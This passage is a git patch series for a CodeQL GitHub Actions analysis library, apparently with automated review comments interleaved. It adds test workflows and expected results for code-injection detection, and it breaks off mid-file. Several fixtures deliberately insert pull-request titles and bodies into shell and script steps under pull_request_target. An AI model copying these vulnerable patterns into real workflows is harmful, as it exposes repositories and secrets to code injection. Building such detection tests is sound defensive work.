a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index fbaf44c282f..9c05256e2fa 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
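Review bot: `DataFlowCallable.getName()` now delegates to `getResolvedPath()`, and `viableCallable` in the last hunk on this line becomes a bare string equality, so call resolution depends entirely on `getResolvedPath()` and `DataFlowCall.getName()` producing the same normal form; neither definition is visible in this patch. The removed code handled three cases explicitly (a repository-root prefix, the `.github/reusable_workflows/` download directory, and the `/action.yml` or `/action.yaml` suffix), and if any of them is not reproduced, the call edge disappears silently and taint through the callee goes unreported rather than failing a build. I would state the contract on `getName()`, e.g. `/** Gets the path a uses: value must carry to refer to this callable; has to equal DataFlowCall.getName() for the call to resolve. */`. The next patch in the series adds fixtures for the download-directory case; a fixture whose workflows sit below a nested repository root is not among the visible ones and would pin the first case. The enclosing class starts outside the hunk.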
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -96,7 +96,10 @@ class ReturnNode extends ExprNode { ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflow s).getOutputs() + ( + exists(ReusableWorkflow w | w.getOutputs() = outputs) or + exists(CompositeAction a | a.getOutputs() = outputs) + ) } ReturnKind getKind() { result = TNormalReturn() } From e8a667fdc6f167209df36cc7d03114c23c58d03e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:43:31 +0200 Subject: [PATCH 0532/1267] Add new tests --- .../.github/actions/action5/action.yml | 8 ++ .../.github/actions/clone-repo/action.yaml | 46 +++++++++ .../.github/workflows/reusable-workflow.yml | 95 +++++++++++++++++++ .../workflows/composite-action-caller-3.yml | 1 + .../workflows/composite-action-caller-4.yml | 18 ++++ .../workflows/reusable-workflow-caller-3.yml | 10 ++ 6 files changed, 178 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 13c246f4ff3..a03c27be226 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -9,6 +9,9 @@ outputs: result: description: "result" value: ${{ steps.step.outputs.result }} + result2: + description: "result" + value: ${{ steps.step2.outputs.result2 }} runs: using: 'composite' steps: 
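Review bot: The two `exists` quantifiers in the `ReturnNode` characteristic predicate bind `w` and `a` only to call `getOutputs()` on them; the `any(...)` form that the removed line used is shorter and keeps the two callee kinds parallel: `outputs = any(ReusableWorkflow w).getOutputs() or` followed by `outputs = any(CompositeAction a).getOutputs()`. If the class's doc comment, which lies outside this hunk, still names only reusable workflows, it should mention composite actions as well, since this is the line that makes their outputs return nodes.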
@@ -20,6 +23,11 @@ runs: FOO: ${{ inputs.taint }} shell: bash run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - id: step2 + env: + FOO2: ${{ github.event.pull_request.body }} + shell: bash + run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 00000000000..75d7e79c1e4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -0,0 +1,46 @@ +name: Clone repository +description: Clone repository +inputs: + title: + description: Title + required: true + forked-pr: + description: Whether the event is operating from a forked PR + required: true + fetch-depth: + description: Fetch depth for actions/checkout + default: "1" +outputs: + result: + description: "result" + value: ${{ steps.out.outputs.replaced }} + +runs: + using: composite + steps: + - shell: bash + run: echo "${{ inputs.title }}" + - uses: frabert/replace-string-action@v2.5 + id: out + with: + pattern: "\"" + string: ${{ inputs.title }} + replace-with: 'foo' + flags: g + - id: out2 + env: + FOO: ${{ inputs.title }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Clone branch + if: "!fromJSON(inputs.forked-pr)" + uses: actions/checkout@v3 + with: + fetch-depth: ${{ inputs.fetch-depth }} + - name: Clone forked PR + if: fromJSON(inputs.forked-pr) + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.number }}/merge + fetch-depth: ${{ inputs.fetch-depth }} + 
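Review bot: The new `step2` has no comment marking it as a taint source that lives inside the action, which is what separates the `result2` case from `result` (the latter is tainted only through `inputs.taint`). Without it, the next reader of the fixture cannot tell from the file which flow each output is meant to exercise when an expected-results line changes. I would add `# source inside the action: result2 is tainted regardless of the caller's inputs` above `- id: step2`. In the first hunk of this file, the new output's `description: "result"` looks copied from the entry above it and could read `"result2"`.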
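Review bot: Step `out2` writes `result=...` to `$GITHUB_OUTPUT`, but the action's declared `outputs.result` reads `steps.out.outputs.replaced`, so nothing in this file consumes `steps.out2.outputs.result`. If that is a deliberate negative case (a tainted step output that must not be reported as reaching the caller), say so with `# out2 is intentionally not wired to an action output` above `- id: out2`; if it was meant to be returned, a second entry under `outputs:` is missing and the fixture does not test what it appears to. The expected results later in the series list only the `steps.out.outputs.replaced` path for this file, which is consistent with either reading.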
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 00000000000..0c4aa93c7a5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml 
@@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = 
content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml index 231cddd0b88..62ad9ba779c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml @@ -11,4 +11,5 @@ jobs: with: taint: ${{ github.event.comment.body }} - run: echo "${{ steps.foo.outputs.result }}" + - run: echo "${{ steps.foo.outputs.result2 }}" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml new file mode 100644 index 00000000000..e6566012732 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml @@ -0,0 +1,18 @@ + +name: Issue Workflow +on: + pull_request_target: +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - name: Clone branch + id: clone + uses: TestOrg/TestRepo/.github/actions/clone-repo@main + with: + title: ${{ github.event.pull_request.title }} + forked-pr: true + fetch-depth: 2 + - run: echo "${{ steps.clone.outputs.result }}" + 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml new file mode 100644 index 00000000000..39dfafcf023 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml @@ -0,0 +1,10 @@ +name: Caller + +on: + pull_request_target: + +jobs: + test: + uses: TestOrg/TestRepo/.github/workflows/reusable-workflow.yml@main + with: + taint: ${{ github.event.pull_request.title }} From f095622a9bfde15828e876e23194a774c0b93686 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:50:59 +0200 Subject: [PATCH 0533/1267] Update expected test results --- .../CWE-020/ReusableWorkflowsSinks.expected | 16 +++++ .../CWE-094/CodeInjectionCritical.expected | 66 +++++++++++++++++-- .../CWE-094/CodeInjectionMedium.expected | 56 +++++++++++++++- .../CWE-829/UnpinnedActionsTag.expected | 4 +- 4 files changed, 132 insertions(+), 10 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index f2178960774..18e9f0186df 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected 
@@ -1,7 +1,23 @@ edges +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes +| .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | semmle.label | Job: call2 [workflow-output1] | +| .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | semmle.label | needs.call2.outputs.workflow-output1 | | 
.github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output Job outputs node [workflow-output1] | semmle.label | output Job outputs node [workflow-output1] | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 818b106b6d7..749d0524415 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,5 +1,20 @@ edges -| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input 
title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | 
@@ -30,7 +45,13 @@ edges | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | provenance | | | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | provenance | | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | 
.github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | provenance | | @@ -72,6 +93,7 @@ edges | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| 
.github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | 
@@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -387,10 +435,15 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
